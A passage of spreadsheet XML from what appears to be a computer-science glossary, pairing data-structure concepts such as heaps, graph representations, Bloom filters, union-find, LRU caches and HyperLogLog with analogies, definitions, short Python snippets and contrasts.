          <t>Merge k sorted lists</t>
        </is>
      </c>
      <c r="D170" t="inlineStr">
        <is>
          <t>K conveyor belts feed one funnel where a claw always grabs the smallest front item; the belt that lost it advances one notch.</t>
        </is>
      </c>
      <c r="E170" t="inlineStr">
        <is>
          <t>Keep a heap of each list's current head: pop the min, push its successor - merging k sorted streams in O(N log k).</t>
        </is>
      </c>
      <c r="F170" t="inlineStr">
        <is>
          <t>import heapq / merged = heapq.merge(*sorted_lists)</t>
        </is>
      </c>
      <c r="G170" t="inlineStr">
        <is>
          <t>vs the two-way merge step of mergesort: same idea, but the heap generalizes 2 lists to k at log k per element</t>
        </is>
      </c>
      <c r="H170" t="inlineStr">
        <is>
          <t>k rivers joining into one sorted delta</t>
        </is>
      </c>
      <c r="J170" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K170" t="inlineStr">
        <is>
          <t>Heaps &amp; priority queues</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" t="n">
        <v>0</v>
      </c>
      <c r="B171" t="inlineStr">
        <is>
          <t>169</t>
        </is>
      </c>
      <c r="C171" t="inlineStr">
        <is>
          <t>Heap's partial order</t>
        </is>
      </c>
      <c r="D171" t="inlineStr">
        <is>
          <t>The dessert pyramid again: the peak dollop is certainly lightest, but two puddings halfway up may sit in any order - reading the pyramid left to right yields mush, not a ranking.</t>
        </is>
      </c>
      <c r="E171" t="inlineStr">
        <is>
          <t>Only the root is guaranteed extreme; siblings and levels are mutually unordered, so scanning the heap array does not give sorted output.</t>
        </is>
      </c>
      <c r="F171" t="inlineStr">
        <is>
          <t>h = [1, 5, 2, 9, 6, 3] # valid min-heap, not sorted / out = [heapq.heappop(h) for _ in range(len(h))] # sorted</t>
        </is>
      </c>
      <c r="G171" t="inlineStr">
        <is>
          <t>Sorted array - a sorted array orders every element (k-th in O(1)); a heap exposes only the extreme, so k-th costs k pops.</t>
        </is>
      </c>
      <c r="H171" t="inlineStr">
        <is>
          <t>Podium winners above a jumbled crowd.</t>
        </is>
      </c>
      <c r="J171" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K171" t="inlineStr">
        <is>
          <t>Heaps &amp; priority queues</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" t="n">
        <v>0</v>
      </c>
      <c r="B172" t="inlineStr">
        <is>
          <t>170</t>
        </is>
      </c>
      <c r="C172" t="inlineStr">
        <is>
          <t>Graph (vertices and edges)</t>
        </is>
      </c>
      <c r="D172" t="inlineStr">
        <is>
          <t>A detective's cork-board conspiracy wall: photos (vertices) joined by red yarn (edges), any photo to any photo - no hierarchy, only relationships.</t>
        </is>
      </c>
      <c r="E172" t="inlineStr">
        <is>
          <t>A set of vertices connected by edges, modeling arbitrary pairwise relationships - the most general linked structure; trees are special cases.</t>
        </is>
      </c>
      <c r="F172" t="inlineStr">
        <is>
          <t>V = {'A', 'B', 'C'} / E = {('A','B'), ('B','C')}</t>
        </is>
      </c>
      <c r="G172" t="inlineStr">
        <is>
          <t>Tree - a tree is a restricted graph: connected, acyclic, n-1 edges, one parent per node.</t>
        </is>
      </c>
      <c r="H172" t="inlineStr">
        <is>
          <t>Subway map (rejected: subways imply planarity and routes).</t>
        </is>
      </c>
      <c r="J172" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K172" t="inlineStr">
        <is>
          <t>Graphs: representation</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" t="n">
        <v>0</v>
      </c>
      <c r="B173" t="inlineStr">
        <is>
          <t>171</t>
        </is>
      </c>
      <c r="C173" t="inlineStr">
        <is>
          <t>Directed vs undirected</t>
        </is>
      </c>
      <c r="D173" t="inlineStr">
        <is>
          <t>Instagram versus a handshake: following someone is a one-way arrow they may never return (directed); a handshake cannot be one-sided (undirected).</t>
        </is>
      </c>
      <c r="E173" t="inlineStr">
        <is>
          <t>Directed edges are one-way arrows (u to v does not imply v to u); undirected edges are mutual - the choice changes reachability entirely.</t>
        </is>
      </c>
      <c r="F173" t="inlineStr">
        <is>
          <t>adj['A'].append('B') # directed edge / adj['A'].append('B'); adj['B'].append('A') # undirected</t>
        </is>
      </c>
      <c r="G173" t="inlineStr">
        <is>
          <t>Weighted vs directed - orthogonal properties: direction says WHICH way you may travel, weight says what the trip costs.</t>
        </is>
      </c>
      <c r="H173" t="inlineStr">
        <is>
          <t>One-way street signs.</t>
        </is>
      </c>
      <c r="J173" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K173" t="inlineStr">
        <is>
          <t>Graphs: representation</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" t="n">
        <v>0</v>
      </c>
      <c r="B174" t="inlineStr">
        <is>
          <t>172</t>
        </is>
      </c>
      <c r="C174" t="inlineStr">
        <is>
          <t>Weighted graph</t>
        </is>
      </c>
      <c r="D174" t="inlineStr">
        <is>
          <t>A road map where every segment has a toll sign: the 2-road route with 50-dollar tolls loses to the 5-road route with 2-dollar tolls.</t>
        </is>
      </c>
      <c r="E174" t="inlineStr">
        <is>
          <t>Each edge carries a cost (distance, time, capacity); the best route minimizes total weight, not hop count.</t>
        </is>
      </c>
      <c r="F174" t="inlineStr">
        <is>
          <t>adj['A'] = [('B', 5), ('C', 1)] / # edge A-&gt;C costs 1</t>
        </is>
      </c>
      <c r="G174" t="inlineStr">
        <is>
          <t>Unweighted shortest path - plain BFS finds fewest hops; weights break BFS and demand Dijkstra-style algorithms (another domain).</t>
        </is>
      </c>
      <c r="H174" t="inlineStr">
        <is>
          <t>Hiking trails labeled with elevation gain.</t>
        </is>
      </c>
      <c r="J174" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K174" t="inlineStr">
        <is>
          <t>Graphs: representation</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" t="n">
        <v>0</v>
      </c>
      <c r="B175" t="inlineStr">
        <is>
          <t>173</t>
        </is>
      </c>
      <c r="C175" t="inlineStr">
        <is>
          <t>Adjacency list</t>
        </is>
      </c>
      <c r="D175" t="inlineStr">
        <is>
          <t>Every guest at a party holds a slim personal address book listing only their friends: to see Bob's circle you read Bob's booklet, never the whole town census.</t>
        </is>
      </c>
      <c r="E175" t="inlineStr">
        <is>
          <t>For each vertex, store a list of its neighbors: O(V+E) space and fast iteration over a node's edges - the default for sparse graphs.</t>
        </is>
      </c>
      <c r="F175" t="inlineStr">
        <is>
          <t>adj = {'A': ['B','C'], 'B': ['C'], 'C': []} / for nb in adj['A']: visit(nb)</t>
        </is>
      </c>
      <c r="G175" t="inlineStr">
        <is>
          <t>Adjacency matrix - the matrix answers 'is u linked to v?' in O(1) but burns V^2 space; the list stores only edges that exist.</t>
        </is>
      </c>
      <c r="H175" t="inlineStr">
        <is>
          <t>A Rolodex per person.</t>
        </is>
      </c>
      <c r="J175" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K175" t="inlineStr">
        <is>
          <t>Graphs: representation</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" t="n">
        <v>0</v>
      </c>
      <c r="B176" t="inlineStr">
        <is>
          <t>174</t>
        </is>
      </c>
      <c r="C176" t="inlineStr">
        <is>
          <t>Adjacency matrix</t>
        </is>
      </c>
      <c r="D176" t="inlineStr">
        <is>
          <t>A giant wall spreadsheet of every guest against every guest: one glance at row Bob, column Ann answers 'do they know each other?' - but the wall is 99 percent empty checkboxes.</t>
        </is>
      </c>
      <c r="E176" t="inlineStr">
        <is>
          <t>A V-by-V grid where cell [u][v] holds 1 (or the weight) iff edge u to v exists: O(1) edge lookup, O(V^2) space even with few edges.</t>
        </is>
      </c>
      <c r="F176" t="inlineStr">
        <is>
          <t>m = [[0,1,0],[0,0,1],[0,0,0]] / m[0][1] == 1 # edge 0 -&gt; 1 exists</t>
        </is>
      </c>
      <c r="G176" t="inlineStr">
        <is>
          <t>Adjacency list - the matrix wins on dense graphs and O(1) edge tests; the list wins on sparse graphs and neighbor iteration.</t>
        </is>
      </c>
      <c r="H176" t="inlineStr">
        <is>
          <t>Battleship grid of hits.</t>
        </is>
      </c>
      <c r="J176" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K176" t="inlineStr">
        <is>
          <t>Graphs: representation</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" t="n">
        <v>0</v>
      </c>
      <c r="B177" t="inlineStr">
        <is>
          <t>175</t>
        </is>
      </c>
      <c r="C177" t="inlineStr">
        <is>
          <t>Edge list</t>
        </is>
      </c>
      <c r="D177" t="inlineStr">
        <is>
          <t>A guest log at the door recording each handshake as one line - 'Bob-Ann, warmth 7' - no page per person, just a ledger of the shakes themselves, easy to sort by warmth.</t>
        </is>
      </c>
      <c r="E177" t="inlineStr">
        <is>
          <t>The graph as a flat list of (u, v, weight) tuples: minimal, trivially sorted by weight - the input format Kruskal-style algorithms want.</t>
        </is>
      </c>
      <c r="F177" t="inlineStr">
        <is>
          <t>edges = [(0,1,4), (1,2,2), (0,2,7)] / edges.sort(key=lambda e: e[2])</t>
        </is>
      </c>
      <c r="G177" t="inlineStr">
        <is>
          <t>Adjacency list - an edge list cannot answer 'neighbors of u' without a full scan; it is a transport and sorting format, not a lookup structure.</t>
        </is>
      </c>
      <c r="H177" t="inlineStr">
        <is>
          <t>Airline flight manifest.</t>
        </is>
      </c>
      <c r="J177" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K177" t="inlineStr">
        <is>
          <t>Graphs: representation</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" t="n">
        <v>0</v>
      </c>
      <c r="B178" t="inlineStr">
        <is>
          <t>176</t>
        </is>
      </c>
      <c r="C178" t="inlineStr">
        <is>
          <t>Sparse vs dense graphs</t>
        </is>
      </c>
      <c r="D178" t="inlineStr">
        <is>
          <t>Country roads versus a round-robin chess club: villages touch 2 or 3 neighbors (sparse - keep short lists), while every chess player plays every other (dense - print the full crosstable).</t>
        </is>
      </c>
      <c r="E178" t="inlineStr">
        <is>
          <t>Sparse: edge count near V (use adjacency lists); dense: edge count near V^2 (a matrix becomes reasonable) - representation follows density.</t>
        </is>
      </c>
      <c r="F178" t="inlineStr">
        <is>
          <t>E ~ V -&gt; adjacency list / E ~ V*V -&gt; matrix is fine</t>
        </is>
      </c>
      <c r="G178" t="inlineStr">
        <is>
          <t>Sparse matrix storage - the same instinct with the same word: when most cells are empty, store only what actually exists.</t>
        </is>
      </c>
      <c r="H178" t="inlineStr">
        <is>
          <t>Fishnet vs solid fabric.</t>
        </is>
      </c>
      <c r="J178" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K178" t="inlineStr">
        <is>
          <t>Graphs: representation</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" t="n">
        <v>0</v>
      </c>
      <c r="B179" t="inlineStr">
        <is>
          <t>177</t>
        </is>
      </c>
      <c r="C179" t="inlineStr">
        <is>
          <t>DAG (directed acyclic graph)</t>
        </is>
      </c>
      <c r="D179" t="inlineStr">
        <is>
          <t>A university prerequisite chart: arrows run Calc I to Calc II to Real Analysis - no course can transitively require itself, or nobody would ever graduate.</t>
        </is>
      </c>
      <c r="E179" t="inlineStr">
        <is>
          <t>A directed graph with no cycles: following arrows can never return you to a start, so a linear ordering (topological sort) always exists.</t>
        </is>
      </c>
      <c r="F179" t="inlineStr">
        <is>
          <t># build systems, spreadsheet cells, git history / edges = [('calc1','calc2'), ('calc2','analysis')]</t>
        </is>
      </c>
      <c r="G179" t="inlineStr">
        <is>
          <t>Tree - every tree is a DAG, but a DAG allows multiple parents (diamond dependencies); it forbids only cycles.</t>
        </is>
      </c>
      <c r="H179" t="inlineStr">
        <is>
          <t>Waterfall - water never flows back uphill.</t>
        </is>
      </c>
      <c r="J179" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K179" t="inlineStr">
        <is>
          <t>Graphs: representation</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" t="n">
        <v>0</v>
      </c>
      <c r="B180" t="inlineStr">
        <is>
          <t>178</t>
        </is>
      </c>
      <c r="C180" t="inlineStr">
        <is>
          <t>Cycle in a graph</t>
        </is>
      </c>
      <c r="D180" t="inlineStr">
        <is>
          <t>Three coworkers each waiting on the next one's sign-off: Ann waits on Bob, Bob on Carl, Carl on Ann - the approval email orbits the office forever.</t>
        </is>
      </c>
      <c r="E180" t="inlineStr">
        <is>
          <t>A path that starts and ends at the same vertex; cycles enable deadlock, break topological order, and make naive traversal loop forever.</t>
        </is>
      </c>
      <c r="F180" t="inlineStr">
        <is>
          <t>A -&gt; B -&gt; C -&gt; A # cycle / # import a inside b.py, import b inside a.py</t>
        </is>
      </c>
      <c r="G180" t="inlineStr">
        <is>
          <t>Self-loop - a self-loop is a length-1 cycle from a vertex to itself; general cycles pass through several vertices.</t>
        </is>
      </c>
      <c r="H180" t="inlineStr">
        <is>
          <t>Escher's endless staircase.</t>
        </is>
      </c>
      <c r="J180" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K180" t="inlineStr">
        <is>
          <t>Graphs: representation</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" t="n">
        <v>0</v>
      </c>
      <c r="B181" t="inlineStr">
        <is>
          <t>179</t>
        </is>
      </c>
      <c r="C181" t="inlineStr">
        <is>
          <t>Implicit graph</t>
        </is>
      </c>
      <c r="D181" t="inlineStr">
        <is>
          <t>A Rubik's Cube 'map' that exists nowhere on paper: each twist conjures the neighboring cube-state out of thin air - the full atlas of 43 quintillion nodes could never be printed.</t>
        </is>
      </c>
      <c r="E181" t="inlineStr">
        <is>
          <t>A graph never stored explicitly: states are vertices and a neighbor function generates edges on demand - puzzles, grids, word ladders.</t>
        </is>
      </c>
      <c r="F181" t="inlineStr">
        <is>
          <t>def neighbors(state): / return [apply(m, state) for m in moves]</t>
        </is>
      </c>
      <c r="G181" t="inlineStr">
        <is>
          <t>Explicit adjacency structure - the same algorithms run on both; implicit graphs trade storage for computing neighbors at visit time.</t>
        </is>
      </c>
      <c r="H181" t="inlineStr">
        <is>
          <t>Multiverse of chess positions.</t>
        </is>
      </c>
      <c r="J181" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K181" t="inlineStr">
        <is>
          <t>Graphs: representation</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" t="n">
        <v>0</v>
      </c>
      <c r="B182" t="inlineStr">
        <is>
          <t>180</t>
        </is>
      </c>
      <c r="C182" t="inlineStr">
        <is>
          <t>Bloom filter</t>
        </is>
      </c>
      <c r="D182" t="inlineStr">
        <is>
          <t>A bouncer stamps 3 hash-chosen dots per guest onto one shared wrist card: any dot missing - you were NEVER here; all three stamped - probably here, though strangers' overlapping stamps can lie.</t>
        </is>
      </c>
      <c r="E182" t="inlineStr">
        <is>
          <t>A bit array plus k hash functions answering membership with 'definitely not' or 'probably yes' - tiny memory, zero false negatives.</t>
        </is>
      </c>
      <c r="F182" t="inlineStr">
        <is>
          <t>for h in hashes: bits[h(x) % m] = 1 # add / # query: all set -&gt; maybe present; any 0 -&gt; definitely absent</t>
        </is>
      </c>
      <c r="G182" t="inlineStr">
        <is>
          <t>Hash set - a set answers exactly and stores the keys; a Bloom filter stores only bits, cannot enumerate or delete, and may false-positive.</t>
        </is>
      </c>
      <c r="H182" t="inlineStr">
        <is>
          <t>Passport stamp pages.</t>
        </is>
      </c>
      <c r="J182" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K182" t="inlineStr">
        <is>
          <t>Probabilistic &amp; specialized structures</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" t="n">
        <v>0</v>
      </c>
      <c r="B183" t="inlineStr">
        <is>
          <t>181</t>
        </is>
      </c>
      <c r="C183" t="inlineStr">
        <is>
          <t>Skip list</t>
        </is>
      </c>
      <c r="D183" t="inlineStr">
        <is>
          <t>An express-train system above a local line: the local stops everywhere, the express skips half the stations, the super-express half again - ride high, drop down as you near your stop. Stations earn express platforms by coin flip.</t>
        </is>
      </c>
      <c r="E183" t="inlineStr">
        <is>
          <t>Sorted linked lists stacked in layers; coin flips promote nodes upward, so searches skip ahead in O(log n) expected time.</t>
        </is>
      </c>
      <c r="F183" t="inlineStr">
        <is>
          <t># promote node while random() &lt; 0.5 / # search: run right until overshoot, then drop one level</t>
        </is>
      </c>
      <c r="G183" t="inlineStr">
        <is>
          <t>Balanced BST - the same O(log n) sorted operations, but skip lists swap rotations for randomness and go lock-free easily (Redis sorted sets).</t>
        </is>
      </c>
      <c r="H183" t="inlineStr">
        <is>
          <t>Skipping stones across a pond.</t>
        </is>
      </c>
      <c r="J183" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K183" t="inlineStr">
        <is>
          <t>Probabilistic &amp; specialized structures</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" t="n">
        <v>0</v>
      </c>
      <c r="B184" t="inlineStr">
        <is>
          <t>182</t>
        </is>
      </c>
      <c r="C184" t="inlineStr">
        <is>
          <t>Union-find (disjoint sets)</t>
        </is>
      </c>
      <c r="D184" t="inlineStr">
        <is>
          <t>Clan totems: every villager points at a parent villager, chains ending at the clan chief; a marriage (union) simply makes one chief bow to the other, fusing whole clans in one gesture.</t>
        </is>
      </c>
      <c r="E184" t="inlineStr">
        <is>
          <t>Tracks a partition of items into groups: find(x) walks to the group's root representative; union(a,b) merges two groups by linking roots.</t>
        </is>
      </c>
      <c r="F184" t="inlineStr">
        <is>
          <t>def find(x): / while p[x] != x: x = p[x] / return x # union: p[find(a)] = find(b)</t>
        </is>
      </c>
      <c r="G184" t="inlineStr">
        <is>
          <t>Hash-set-per-group - merging sets by copying members costs O(n) per merge; union-find merges with one pointer change.</t>
        </is>
      </c>
      <c r="H184" t="inlineStr">
        <is>
          <t>Corporate mergers redrawing org charts.</t>
        </is>
      </c>
      <c r="J184" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K184" t="inlineStr">
        <is>
          <t>Probabilistic &amp; specialized structures</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" t="n">
        <v>0</v>
      </c>
      <c r="B185" t="inlineStr">
        <is>
          <t>183</t>
        </is>
      </c>
      <c r="C185" t="inlineStr">
        <is>
          <t>Path compression + rank</t>
        </is>
      </c>
      <c r="D185" t="inlineStr">
        <is>
          <t>After trekking the chain of elders to the chief, every villager along the path is handed the chief's direct phone number - next time, one call. And marriages always bow the SHORTER totem pole to the taller.</t>
        </is>
      </c>
      <c r="E185" t="inlineStr">
        <is>
          <t>During find, repoint every visited node directly at the root; with union-by-rank this amortizes to near-constant (inverse Ackermann) time.</t>
        </is>
      </c>
      <c r="F185" t="inlineStr">
        <is>
          <t>def find(x): / if p[x] != x: p[x] = find(p[x]) # compress / return p[x]</t>
        </is>
      </c>
      <c r="G185" t="inlineStr">
        <is>
          <t>Plain union-find - without compression a find can walk O(n) chains; compression flattens trees to near-constant depth.</t>
        </is>
      </c>
      <c r="H185" t="inlineStr">
        <is>
          <t>Desire paths worn straight across a lawn.</t>
        </is>
      </c>
      <c r="J185" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K185" t="inlineStr">
        <is>
          <t>Probabilistic &amp; specialized structures</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" t="n">
        <v>0</v>
      </c>
      <c r="B186" t="inlineStr">
        <is>
          <t>184</t>
        </is>
      </c>
      <c r="C186" t="inlineStr">
        <is>
          <t>LRU cache (map + DLL)</t>
        </is>
      </c>
      <c r="D186" t="inlineStr">
        <is>
          <t>A coat rack by a busy door with a valet's index: any coat worn gets rehung nearest the door, and when the rack fills, the dustiest coat at the far end is donated. The index card finds any coat instantly.</t>
        </is>
      </c>
      <c r="E186" t="inlineStr">
        <is>
          <t>A hashmap pointing into a doubly linked list ordered by recency: O(1) lookup via the map, O(1) move-to-front and tail eviction via the list.</t>
        </is>
      </c>
      <c r="F186" t="inlineStr">
        <is>
          <t>node = index[key] # O(1) find / dll.move_to_front(node) # O(1) recency bump / if full: evict(dll.tail); del index[tail.key]</t>
        </is>
      </c>
      <c r="G186" t="inlineStr">
        <is>
          <t>LFU - LRU evicts the least RECENTLY used (recency); LFU evicts the least FREQUENTLY used (count). functools.lru_cache is the former.</t>
        </is>
      </c>
      <c r="H186" t="inlineStr">
        <is>
          <t>Gym towel depth chart.</t>
        </is>
      </c>
      <c r="J186" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K186" t="inlineStr">
        <is>
          <t>Probabilistic &amp; specialized structures</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" t="n">
        <v>0</v>
      </c>
      <c r="B187" t="inlineStr">
        <is>
          <t>185</t>
        </is>
      </c>
      <c r="C187" t="inlineStr">
        <is>
          <t>Count-min sketch</t>
        </is>
      </c>
      <c r="D187" t="inlineStr">
        <is>
          <t>Four tally clerks, each with a short row of buckets and their own way of mishearing names: 'Bob' bumps one bucket per clerk; to read Bob's count you take the MINIMUM of his four buckets - the least-polluted tally.</t>
        </is>
      </c>
      <c r="E187" t="inlineStr">
        <is>
          <t>A small grid of counters updated through k hash rows to estimate stream frequencies: never undercounts, may overcount from collisions.</t>
        </is>
      </c>
      <c r="F187" t="inlineStr">
        <is>
          <t>for i, h in enumerate(hs): grid[i][h(x) % w] += 1 / est = min(grid[i][h(x) % w] for i, h in enumerate(hs))</t>
        </is>
      </c>
      <c r="G187" t="inlineStr">
        <is>
          <t>Bloom filter - Bloom answers 'is it present?' with bits; count-min answers 'how many times?' with counters. Both err one-sidedly.</t>
        </is>
      </c>
      <c r="H187" t="inlineStr">
        <is>
          <t>Dented turnstile counters.</t>
        </is>
      </c>
      <c r="J187" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K187" t="inlineStr">
        <is>
          <t>Probabilistic &amp; specialized structures</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" t="n">
        <v>0</v>
      </c>
      <c r="B188" t="inlineStr">
        <is>
          <t>186</t>
        </is>
      </c>
      <c r="C188" t="inlineStr">
        <is>
          <t>Bitset (bit array)</t>
        </is>
      </c>
      <c r="D188" t="inlineStr">
        <is>
          <t>A 64-window advent calendar per word: window n open means n is in the set; checking is a one-finger poke, and intersecting two calendars (AND) slams all 64 windows at once.</t>
        </is>
      </c>
      <c r="E188" t="inlineStr">
        <is>
          <t>A set of small integers as bits packed into machine words: membership, add, remove are single bit ops, and 64 elements fit per word.</t>
        </is>
      </c>
      <c r="F188" t="inlineStr">
        <is>
          <t>bits |= 1 &lt;&lt; n # add n / bits &gt;&gt; n &amp; 1 # test n / both = a &amp; b # whole-set intersection, one op</t>
        </is>
      </c>
      <c r="G188" t="inlineStr">
        <is>
          <t>Hash set of ints - a bitset needs a bounded dense universe but is ~100x smaller and word-parallel; hash sets take sparse or huge keys.</t>
        </is>
      </c>
      <c r="H188" t="inlineStr">
        <is>
          <t>Player-piano punch roll.</t>
        </is>
      </c>
      <c r="J188" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K188" t="inlineStr">
        <is>
          <t>Probabilistic &amp; specialized structures</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" t="n">
        <v>0</v>
      </c>
      <c r="B189" t="inlineStr">
        <is>
          <t>187</t>
        </is>
      </c>
      <c r="C189" t="inlineStr">
        <is>
          <t>HyperLogLog</t>
        </is>
      </c>
      <c r="D189" t="inlineStr">
        <is>
          <t>Judging a casino's total crowd by its luckiest coin-flipper: someone who hit 20 heads in a row implies about a million visitors passed through - keep many judges (buckets) and average, since one lucky streak lies.</t>
        </is>
      </c>
      <c r="E189" t="inlineStr">
        <is>
          <t>Estimates the number of DISTINCT items in a stream within a few KB by tracking the maximum run of leading zero bits per hash bucket.</t>
        </is>
      </c>
      <c r="F189" t="inlineStr">
        <is>
          <t># Redis: PFADD visitors u1 u2; PFCOUNT visitors / # ~0.8% error on billions of uniques using 12KB</t>
        </is>
      </c>
      <c r="G189" t="inlineStr">
        <is>
          <t>Count-min sketch - count-min estimates each item's frequency; HyperLogLog estimates how many distinct items exist at all.</t>
        </is>
      </c>
      <c r="H189" t="inlineStr">
        <is>
          <t>Biggest-fish bragging as a proxy for lake size.</t>
        </is>
      </c>
      <c r="J189" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K189" t="inlineStr">
        <is>
          <t>Probabilistic &amp; specialized structures</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" t="n">
        <v>0</v>
      </c>
      <c r="B190" t="inlineStr">
        <is>
          <t>188</t>
        </is>
      </c>
      <c r="C190" t="inlineStr">
        <is>
          <t>Rope (text tree)</t>
        </is>
      </c>
      <c r="D190" t="inlineStr">
        <is>
          <t>A climbing rope braided from short segments, with knots (internal nodes) recording the length hanging to their left: splicing in a paragraph means retying a couple of knots, never rewinding the whole rope.</t>
        </is>
      </c>
      <c r="E190" t="inlineStr">
        <is>
          <t>A binary tree whose leaves hold short string chunks; insert, delete, and concat in huge texts cost O(log n) instead of copying megabytes.</t>
        </is>
      </c>
      <c r="F190" t="inlineStr">
        <is>
          <t># editors: VS Code's piece tree is a cousin / insert(pos, t) # split rope, concat 3 pieces, O(log n) / # vs str: s[:i] + t + s[i:] copies every byte</t>
        </is>
      </c>
      <c r="G190" t="inlineStr">
        <is>
          <t>Contiguous string - strings are immutable arrays where every mid-edit rebuilds O(n) bytes; ropes localize edits for editors.</t>
        </is>
      </c>
      <c r="H190" t="inlineStr">
        <is>
          <t>Freight train of text cars.</t>
        </is>
      </c>
      <c r="J190" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K190" t="inlineStr">
        <is>
          <t>Probabilistic &amp; specialized structures</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" t="n">
        <v>0</v>
      </c>
      <c r="B191" t="inlineStr">
        <is>
          <t>189</t>
        </is>
      </c>
      <c r="C191" t="inlineStr">
        <is>
          <t>Quadtree</t>
        </is>
      </c>
      <c r="D191" t="inlineStr">
        <is>
          <t>A treasure map cut into quarters, and any crowded quarter cut into quarters again: pirates search only the postage-stamp squares near the X, ignoring three quarters of the ocean at every level.</t>
        </is>
      </c>
      <c r="E191" t="inlineStr">
        <is>
          <t>A spatial tree recursively splitting a 2D region into four quadrants until each cell holds few points - fast neighborhood and collision queries.</t>
        </is>
      </c>
      <c r="F191" t="inlineStr">
        <is>
          <t>if len(points) &gt; cap: / split(NW, NE, SW, SE) / query(rect) # descend only intersecting quadrants</t>
        </is>
      </c>
      <c r="G191" t="inlineStr">
        <is>
          <t>k-d tree - a k-d tree splits along one alternating axis per level; a quadtree always splits into four fixed quadrants (octree in 3D).</t>
        </is>
      </c>
      <c r="H191" t="inlineStr">
        <is>
          <t>Map-tile zoom levels.</t>
        </is>
      </c>
      <c r="J191" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K191" t="inlineStr">
        <is>
          <t>Probabilistic &amp; specialized structures</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" t="n">
        <v>0</v>
      </c>
      <c r="B192" t="inlineStr">
        <is>
          <t>190</t>
        </is>
      </c>
      <c r="C192" t="inlineStr">
        <is>
          <t>Every structure trades costs</t>
        </is>
      </c>
      <c r="D192" t="inlineStr">
        <is>
          <t>A tool wall, never a super-tool: the hammer (array) strikes fast but cannot grip; the pliers (list) grip but cannot strike - the craftsman picks per job, and the 'one tool to rule them all' rusts unused.</t>
        </is>
      </c>
      <c r="E192" t="inlineStr">
        <is>
          <t>No structure wins everywhere: speed on one operation is bought with time on another, memory, ordering, or complexity - choose per workload.</t>
        </is>
      </c>
      <c r="F192" t="inlineStr">
        <is>
          <t>dict: O(1) get, unordered, RAM-hungry / list: cheap append/scan, O(n) search / sorted arr: O(log n) search, O(n) insert</t>
        </is>
      </c>
      <c r="G192" t="inlineStr">
        <is>
          <t>Big-O ranking alone - asymptotics order growth rates, but the real trade-off space adds memory, ordering, stability, and constants.</t>
        </is>
      </c>
      <c r="H192" t="inlineStr">
        <is>
          <t>Swiss army knife myth (rejected: it implies one tool CAN do it all).</t>
        </is>
      </c>
      <c r="J192" t="inlineStr">
        <is>
          <t>Data structures</t>
        </is>
      </c>
      <c r="K192" t="inlineStr">
        <is>
          <t>Choosing structures: trade-offs</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" t="n">
        <v>0</v>
      </c>
      <c r="B193" t="inlineStr">
        <is>
          <t>191</t>
        </is>
      </c>
      <c r="C193" t="inlineStr">
        <is>
          <t>Amortized analysis</t>
        </is>
      </c>
      <c r="D193" t="inlineStr">
        <is>
          <t>A gym membership: the annual fee stings once, but spread over 300 visits each workout costs pocket change - guaranteed accounting, not luck.</t>
        </is>
      </c>
      <c r="E193" t="inlineStr">
        <is>
          <t>Charges rare expensive operations against the many cheap ones around them, bounding the average per operation over ANY sequence - no probability involved.</t>
        </is>
      </c>
      <c r="F193" t="inlineStr">
        <is>
          <t>1000 appends trigger ~10 resizes copying ~2000 items / # total / ops -&gt; O(1) amortized per append</t>
        </is>
      </c>
      <c r="G193" t="inlineStr">
        <is>
          <t>Average case - average case depends on input randomness or distribution; amortized is a worst-case guarantee over any operation sequence.</t>
        </is>
      </c>
      <c r="H193" t="inlineStr">
        <is>
          <t>Prepaid toll transponder.</t>
        </is>
      </c>
      <c r="J193" t="inlineStr">
        <is>
          <t>Data structures</t>
